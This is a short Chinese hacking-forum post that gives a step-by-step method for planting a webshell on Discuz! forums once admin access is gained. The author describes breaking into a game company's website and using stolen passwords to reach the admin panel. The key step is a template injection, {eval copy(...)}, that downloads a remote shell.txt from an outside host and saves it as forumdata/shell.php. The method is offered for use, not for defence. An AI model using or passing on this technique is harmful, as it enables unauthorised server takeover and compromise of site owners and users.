蓝盟诗人[LUC]蓝客联盟

忘记密码

Discuz!的最新后台通用拿Webshell法,测试可行

2010-09-28 23:49 作者: 来源: 本站 浏览: 1,636 views 我要评论 字号:

Discuz!的最新拿Webshell法,测试可行

无意中入侵了游戏官方网站,可拿不到Webshell,郁闷中发现里面有个Discuz!论坛,马上根据已经拿到的密码社工,呵呵,居然成功进入后台!可是毕竟是6.0+的版本(管理员把版权去掉了),网上众所周知的编辑模板(模板编辑功能受限)办法来拿SHELL很是不爽,想起来编辑任意模板文件,然后eval出SHELL的方法,终于搞定!下面就是方法的实现步骤:
目前通吃所有DZ版本。
1. 随便选一模板文件,选择编辑

2. 找一个空间上传一个webshell, 假定其地址为http://127.0.0.1/bluenoob2013/shell.txt

3. 在任意位置输入:
{eval copy('https://www.bluenoob.com/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}

4. 保存, 刷新

5. 访问该模板所属的文件

6. 把模板恢复原样

大功告成, 访问/forumdata/shell.php便是可爱的马马
来自:互联网

发表评论

*

* (保密)

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.

**/